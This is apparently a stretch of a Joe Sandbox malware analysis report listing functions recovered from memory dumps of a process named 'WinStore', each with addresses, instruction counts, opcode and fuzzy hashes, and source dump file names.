Opcode ID: 8323693cba00dc7dee537911b20511797bfc7ad0530c84e751f3c9c90e32060e
Instruction ID: 413760a62d5e30752a08ad11b2def8d03c6511eba832fa4d6ce1346e53422e9a
Opcode Fuzzy Hash: 8323693cba00dc7dee537911b20511797bfc7ad0530c84e751f3c9c90e32060e
Instruction Fuzzy Hash: 4D515830D1C95A8FEB98EB18C8557A9B7F1FBA8341F5045B9C00DE32D2DF3869819B49

Function 00007FF849315627 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b875c7d6d9aad2c758b20bc259b475525291725df66fcae4b40abb646cb06822
Instruction ID: 405228eb38783302da6d11da50f1eadc759e236574cdbc6050b9fb2433320c93
Opcode Fuzzy Hash: b875c7d6d9aad2c758b20bc259b475525291725df66fcae4b40abb646cb06822
Instruction Fuzzy Hash: 24416631A0C9998FDB98EF2CD45ADA5B3E1FBB9310B04166AD00EC3592DF24F855CB91

Function 00007FF849310497 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6252ca66d8c6b03be717d361c82ff658ec7018d0693c780120c900745f3337ef
Instruction ID: dbcc372d11efe43ca4638ef14ade347d911fadfc7eb030299b35ab135e149a35
Opcode Fuzzy Hash: 6252ca66d8c6b03be717d361c82ff658ec7018d0693c780120c900745f3337ef
Instruction Fuzzy Hash: 5C419331A0C9598FDF98EF28D495DA5B7E1FBA9320B0405AAD00EC3592DF34E885CB95

Function 00007FF8493156D1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c56fe55b95eedd4b2f9d18714b7f534347037c9af24708f0795836c139e9cc
Instruction ID: d442c248544d7ea2945190d4ed23df968203b456a646b61d56bf4226e489b19a
Opcode Fuzzy Hash: 94c56fe55b95eedd4b2f9d18714b7f534347037c9af24708f0795836c139e9cc
Instruction Fuzzy Hash: 01318631A0C9998FDB99EF2CD459DA5B3E1FBB9310B0406AED00EC7592DF24E845CB91

Function 00007FF849310541 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f58f124335a42e40098fe1c7b2e089977eb98a0a8891629bb4fdb614efc73b29
Instruction ID: 8cc82ae81835c9e9b3e192be21966c6be7d2c97ca9aaf9ac6d916bfaf579a4df
Opcode Fuzzy Hash: f58f124335a42e40098fe1c7b2e089977eb98a0a8891629bb4fdb614efc73b29
Instruction Fuzzy Hash: 0C31A231A0C9598FDB59EF28C095E65B7E1FBA9310B0406ADD04EC7592DE34E885CB91

Function 00007FF848F34051 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32caa1c6c1e57679ad19f7c0d64b7adbcd32f434ed6464c1393db8a50624f5a9
Instruction ID: 172768f3065d4aaf20bea6d1c6006b0589b583def3b1cbb37b65cf3314b04778
Opcode Fuzzy Hash: 32caa1c6c1e57679ad19f7c0d64b7adbcd32f434ed6464c1393db8a50624f5a9
Instruction Fuzzy Hash: 1631C231E0CA8A4FE753BB7898551A87FA0FFB5350F4901F7D449CB0D2DA2859458345

Function 00007FF84931566B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7615564d311873cba226ec9fca2985c338d08c1f8045946175d5acd259f8fce
Instruction ID: 1cd36c30ed6776326db1b7db49c77b4da794dfa3bd8e7e701752f6a608b5dd8a
Opcode Fuzzy Hash: e7615564d311873cba226ec9fca2985c338d08c1f8045946175d5acd259f8fce
Instruction Fuzzy Hash: 06315531A0C9899FDB98EF28D459DA5B3E1FB79310B0406AED00EC7592DF28E845CB81

Function 00007FF8493104DB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47f54317f8b95cccd94927c62ee441d1673d0381529c3670a979ef96d14f0ed6
Instruction ID: 2fda725313553461b689daf21fa14b1af12558446c1712fc3206fa59f09a1e44
Opcode Fuzzy Hash: 47f54317f8b95cccd94927c62ee441d1673d0381529c3670a979ef96d14f0ed6
Instruction Fuzzy Hash: 8A317331A0C9598FDF59EF28C095EA5B7E1FBA9310B0406ADD04EC7592DF34E885CB91

Function 00007FF849312EC9 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0352167ee34d59ce7461f93fb70170aaa6bffcc91dd81d22448a45a7211285e
Instruction ID: 2d9fab88315172c5a13e09504deeeef2b6da043e2bbe67a7cc644093d3c58d56
Opcode Fuzzy Hash: b0352167ee34d59ce7461f93fb70170aaa6bffcc91dd81d22448a45a7211285e
Instruction Fuzzy Hash: F931E43191C6C54FE379EE2898071757BE0EF57394F24247ED48EC21B2FA28B5028351

Function 00007FF84931278D Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f42de348c8ddf7b4b372f526f74a91bd56be94c88d5727711c321ac3b4531b
Instruction ID: 65ef783621ee69f03f01a0756e4eb1e1bc0a1267be004a16ced877b2a8da572f
Opcode Fuzzy Hash: 27f42de348c8ddf7b4b372f526f74a91bd56be94c88d5727711c321ac3b4531b
Instruction Fuzzy Hash: 48316E31F0C94A9FD758EA1CD8929A9B3E1FF89750B14523AC01ED3292DF24B8128B85

Function 00007FF848F20C25 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7836c7db1eb2dccdf7ef39bf23ad693b65206bee05a2be5f1f63e44cd8cc90
Instruction ID: c8efc70c6c6c4e023b1bf4a5d018411d91c2efec8bd2bfd72148477288909f21
Opcode Fuzzy Hash: 1b7836c7db1eb2dccdf7ef39bf23ad693b65206bee05a2be5f1f63e44cd8cc90
Instruction Fuzzy Hash: FF31E672D0D69A9FE312BB68A8452ED7BB0EF813A5F0441B6D448CB1C3DB3D2446C799

Function 00007FF849315435 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5842db6497996ab854ccfebdb1abf52beec401fe32064f02eff034e1307092e9
Instruction ID: b5767f29ff8701f3f4ba8fd24dbfeb11d6e40cdfafcad0ead7d0de6c56ea0436
Opcode Fuzzy Hash: 5842db6497996ab854ccfebdb1abf52beec401fe32064f02eff034e1307092e9
Instruction Fuzzy Hash: DF315C30D0C58ACFEBA8EF5884565BE77B1FF5A381F50117AD00ED61A1EF3868408B45

Function 00007FF8493102A5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf82e3181c3912c89a2f6476b5661665812310c943a4f6067502e2b1d939af09
Instruction ID: 38103c6ab890ecc2d120a7e9756613b25911e1504028bfb620b26d2a46428f84
Opcode Fuzzy Hash: bf82e3181c3912c89a2f6476b5661665812310c943a4f6067502e2b1d939af09
Instruction Fuzzy Hash: D4315E3090C99ECFEBA8EF5484525BD77B0FF5A340F50197AD00DE71A1EB3869409B41

Function 00007FF848F20998 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51aa2497400cf627e1e01fc36e2d41acd02cb638ab4201577998398eb345e0b8
Instruction ID: eb5bbb288fd678f0bf65b3d23ffdabbec739416ec04554b59ddbedac1519d828
Opcode Fuzzy Hash: 51aa2497400cf627e1e01fc36e2d41acd02cb638ab4201577998398eb345e0b8
Instruction Fuzzy Hash: FF213620B2C9595FEB48F76C504A679B7C2EFA93A1F1000B9E44EC33D7DD28AC818785

Function 00007FF84931D6FD Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b128bf158b117550f68de6e0c6aeff977c47210434667fd5d8b59dc33d2aae3d
Instruction ID: da4de507eebbe1ae9cb3488d08b5dc7dd52e9674a46295d57c5b607dadf31d43
Opcode Fuzzy Hash: b128bf158b117550f68de6e0c6aeff977c47210434667fd5d8b59dc33d2aae3d
Instruction Fuzzy Hash: 4D210631A0E6C94FE755BB3848662A5BB90EF57350F4842FAC449CB1E3ED1D68498742

Function 00007FF848F2116D Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd84151c8e371b3ec10bdddad1d0e6b150a84e67fa11b6c0b3c556fb2d501d67
Instruction ID: aff6c86ce1e4e954a439b28f5a59a2281d86fde938649bc63a5ddbda71a6ba36
Opcode Fuzzy Hash: cd84151c8e371b3ec10bdddad1d0e6b150a84e67fa11b6c0b3c556fb2d501d67
Instruction Fuzzy Hash: DD31D43190C64A8FDB45FB68D8589B97BF0FF5A310F0405BAC009D72E2DB39A840CB44

Function 00007FF849312863 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12b4309a065461b31717869bf2a4dcec2814dd910d4bf4a66277a9fc2a3e1005
Instruction ID: be3c16b4994133f6f628984a59992065c27240359579905bae3a7dc95a7c4661
Opcode Fuzzy Hash: 12b4309a065461b31717869bf2a4dcec2814dd910d4bf4a66277a9fc2a3e1005
Instruction Fuzzy Hash: 5121D571D0CA898FE769FA6898572A877E1FF56350F14117AC04DC72D3EE1858168381

Function 00007FF849314321 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8598ceb70dfb60f22605f8e1b9f39649f9b8e763ffcb5c4ca5b7a02782168e7f
Instruction ID: be25dc4f97c23ef18fe6fc6a6beffd52b20b0b98892c21c2f24408901c47c13e
Opcode Fuzzy Hash: 8598ceb70dfb60f22605f8e1b9f39649f9b8e763ffcb5c4ca5b7a02782168e7f
Instruction Fuzzy Hash: E8313B2091D5D64FE33A9E28546D5B5BB61EF93350B184AFAC08BCB4A7D81CB895C341

Function 00007FF849310BD8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a80fba4dc7cf58cecfd8e3780a47a8ceb6bcbc5fc1d848ea0491af30aa303884
Instruction ID: 2a77fb7e9c52249997701472af7f15a19f20712ce0a6c8ef70e90be3f91e7ace
Opcode Fuzzy Hash: a80fba4dc7cf58cecfd8e3780a47a8ceb6bcbc5fc1d848ea0491af30aa303884
Instruction Fuzzy Hash: 4E218B34E1C9AE9FDB68EF68C8915FDBBB1FF59340F001179D00AE72A1DE2468018B40

Function 00007FF849311722 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7285c5915c3398e1094ed86eaa9a4d13a9b573f3af825295b731c5222d68adc6
Instruction ID: d54fdfe0f762eb1df941cac4afa643c4fb0b3e0fdbf9a6e0bca05a48596e335b
Opcode Fuzzy Hash: 7285c5915c3398e1094ed86eaa9a4d13a9b573f3af825295b731c5222d68adc6
Instruction Fuzzy Hash: 5321D630E1895D9FDF98EB58D455AE9B7F1FB69300F1001AAD00EE32A6DE35AD418B40

Function 00007FF848F62DDF Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d661790e8d259e7d695e0bc7260380efc0cc7f0dd8ec72d620d0a4fe202c143
Instruction ID: 8c24e474e817f027efbf3521414d3fe95363753e424e97b1b2e25770f7bb17c0
Opcode Fuzzy Hash: 2d661790e8d259e7d695e0bc7260380efc0cc7f0dd8ec72d620d0a4fe202c143
Instruction Fuzzy Hash: 93219530A0CA098FD788FF58C49576977E1EF98354F148639D40DD72D6CF7898428745

Function 00007FF848F23061 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e5c7e1df5b99189750e34c7bf1b6e801b88bdc0395510afaea2f9e239bce66
Instruction ID: f513443ab6fa970a36ba89631774e378f04c8a1ec10d4b304fdb9914880d372b
Opcode Fuzzy Hash: 45e5c7e1df5b99189750e34c7bf1b6e801b88bdc0395510afaea2f9e239bce66
Instruction Fuzzy Hash: 19212A70D0C9198FEB58EB18D495BA9B7A1EB98355F204579C40ED32E1CF36A980CB46

Function 00007FF84931D735 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0f943ff71fe23b02f3928c8187a4f377ebe0aa31eb059133009c825d0ed9256
Instruction ID: 4bd3b00ac9acc204a07daba47e10a567e61b2221b152f70c68e25560d9b30d48
Opcode Fuzzy Hash: f0f943ff71fe23b02f3928c8187a4f377ebe0aa31eb059133009c825d0ed9256
Instruction Fuzzy Hash: E8110331B1EA894FE355EF2888962B6BBD1FF9A240F44417AC44AC31D3ED6C684A8351

Function 00007FF848F5B8B5 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 578219493069f99692cabbd272b51e06e2d049047d42c58f42b785a707b8f0dd
Instruction ID: 41d940e6f88dfd7705e66d613ee62b24e18de328791f7d966d7d762bccdbeee0
Opcode Fuzzy Hash: 578219493069f99692cabbd272b51e06e2d049047d42c58f42b785a707b8f0dd
Instruction Fuzzy Hash: FB11CB3691DC868BE319A72CC4AA4F5F7A0FF1135AF1811B9C0898E1D3EF196887C644

Function 00007FF849314350 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c515b909ce1f04d1f96b5c893a50eb3d8217c4dfc30da7f701f91ec6875bd28
Instruction ID: 3a5b237f66000854faba9f01f6990786cf713440a4f15c1588ef6c3bf19ef116
Opcode Fuzzy Hash: 1c515b909ce1f04d1f96b5c893a50eb3d8217c4dfc30da7f701f91ec6875bd28
Instruction Fuzzy Hash: C5113A3091C4E78FF63C9E08906E5F57391FFA2341B245A75C44F8B4AADC2CB8918784

Function 00007FF84931D750 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0040b264740d6de956b5bcc74b28fb28bfcf81097feb79555793030a108b509
Instruction ID: 565fe479fb49c85b610d253d016435e17a601113fa996f394e3eb9b8c0bcd7d9
Opcode Fuzzy Hash: a0040b264740d6de956b5bcc74b28fb28bfcf81097feb79555793030a108b509
Instruction Fuzzy Hash: 98110230B1DA495FE754FF2888867B676D2FF99340F00423AC80EC32D2ED68A8458390

Function 00007FF848F523CA Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44dd5b45aaff0b4ec6d7293841475335fa0bb9ca190ff2df161a3736eec1ddbd
Instruction ID: eca09b87dc13eeb250f5a5c50d5c10ce93d4a4c2e588587269e2f68d0dddcb1f
Opcode Fuzzy Hash: 44dd5b45aaff0b4ec6d7293841475335fa0bb9ca190ff2df161a3736eec1ddbd
Instruction Fuzzy Hash: 6A119131E0C9568FE759EB58D4956B9B3A2EBA5750F04027AC00ED72C3CF3C6881C796

Function 00007FF848F20C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc0199fbce904f9b71be185b6d3af23b814594d6fe6fbee684a95e4d69415591
Instruction ID: 63ae6f54aab2584a6a5be916950f8c39f0d95bc53d0437537896a8b30ec12c66
Opcode Fuzzy Hash: bc0199fbce904f9b71be185b6d3af23b814594d6fe6fbee684a95e4d69415591
Instruction Fuzzy Hash: 6911C272E0C68D8FE712FB78A8501AC7FB0EF823A0F0545B6D844DB2D2D63955458785

Function 00007FF84931EC48 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30d3ed12eec3fa15c8cc234068af98c550caf32124a3c0a2b98903d7e6c6945c
Instruction ID: a6dc5863d6ec366d9a650cd8baefbd5d081452d784ceaace9302b7996c71faa4
Opcode Fuzzy Hash: 30d3ed12eec3fa15c8cc234068af98c550caf32124a3c0a2b98903d7e6c6945c
Instruction Fuzzy Hash: 9D012625E0EAC08FE7364B785C591617FA1DF1324070C15EFC0968B1B7E80ADC0A8351

Function 00007FF848F5D79C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f83e21febff6767ef3a00004279b9b6f25848326fe0c26ecf246845c1646e0
Instruction ID: 913fb4d49cb38a93a96aeee64548f7420a3bbab7a8d90d3ce0e6d9abaefdfecb
Opcode Fuzzy Hash: 90f83e21febff6767ef3a00004279b9b6f25848326fe0c26ecf246845c1646e0
Instruction Fuzzy Hash: 2F011E32E0D4298BEB54F658A4403FDF3E1EB98761F140175D40DA32C5CB686D4187D4

Function 00007FF848F62D09 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeff531e3dac24e85127be9f9405c90f3c9e7aefc856b0862df9c15ed620aef3
Instruction ID: 7772d161ef5662f1a1957c86defa49384a2bd1aac17021c756361706ad102d02
Opcode Fuzzy Hash: aeff531e3dac24e85127be9f9405c90f3c9e7aefc856b0862df9c15ed620aef3
Instruction Fuzzy Hash: 70014C31D086499FDB59EF58C895AA9B7F1FB98740F14022ED409E3291CB786942CB45

Function 00007FF848F20C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6b4b41b935ea29d99c332a7b969fa9d79fb1fcbdf76286bb0d7fc9ce7a4622
Instruction ID: efaeeac0f92db9ddc829711c6869ec8a95168874c92c4ab9481c36e11d6aab4a
Opcode Fuzzy Hash: 3e6b4b41b935ea29d99c332a7b969fa9d79fb1fcbdf76286bb0d7fc9ce7a4622
Instruction Fuzzy Hash: FF018C72D0D2899FE712FB7498400A87FB0EF82350F1541F6D844DB2D2DA396A45C785

Function 00007FF848F5B1FD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231d3ec9e8295ef8ef28d93855ee48c762d30f749c426e143bc0ac88e508f073
Instruction ID: d2af24cfcf325082a39829735df91226e552c227e95ce4648c8683dfa7f9f909
Opcode Fuzzy Hash: 231d3ec9e8295ef8ef28d93855ee48c762d30f749c426e143bc0ac88e508f073
Instruction Fuzzy Hash: 6FF08C31E2C8498FE685FB28A84A6F8F3E1FB98711F400076E40DC3183CF2858418761

Function 00007FF848F5793D Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d295503a6182fecc283e5a62bcef68ff5a7ea24eceb923d5a2fc49a86c3fa3a
Instruction ID: 85d401d820240c95c75fde7936392d786876a98f24cfb4225ee4940aaa25625f
Opcode Fuzzy Hash: 9d295503a6182fecc283e5a62bcef68ff5a7ea24eceb923d5a2fc49a86c3fa3a
Instruction Fuzzy Hash: 33F03722A0E7C54FD71B5B388C654687FB19E5726170B00E7C481CF0F3DA19998BC362

Function 00007FF848F20C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff854dd9bc77378cd312dc3d405fd3cca80aa03412fefd228ddaee8211cce02f
Instruction ID: 0f680dc61d77662813d3c7daad325165466f4af219a030f975966a45cc147843
Opcode Fuzzy Hash: ff854dd9bc77378cd312dc3d405fd3cca80aa03412fefd228ddaee8211cce02f
Instruction Fuzzy Hash: A7015672D0D2899FE712FB6498540A97FB0EF86350F1441F6D844DB2D2EA396A448785

Function 00007FF849311A32 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2664367722.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078c692e6c5ebc2f46da4f270c7ff9ae8603ddb9119be3685c8fac44a2562e6a
Instruction ID: 389efceda85214ee24d3643befae6a5c70f43f06c742c824446f5bc10b0d09dc
Opcode Fuzzy Hash: 078c692e6c5ebc2f46da4f270c7ff9ae8603ddb9119be3685c8fac44a2562e6a
Instruction Fuzzy Hash: 49F0623244E2C59FD352DBB088529D97FB4AF43254F1910FAD445CB0A3D66D5A0AC752

Function 00007FF848F6121F Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2658893295.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a74584bcbae18d8ea11eba8160dc60894abf29700e70fe9e363c060a18ad0a
Instruction ID: 30da1b89e1f09e9ee5c5fb936c29a9c238775a3807fe0808b5852bc068df15b1
Opcode Fuzzy Hash: a0a74584bcbae18d8ea11eba8160dc60894abf29700e70fe9e363c060a18ad0a
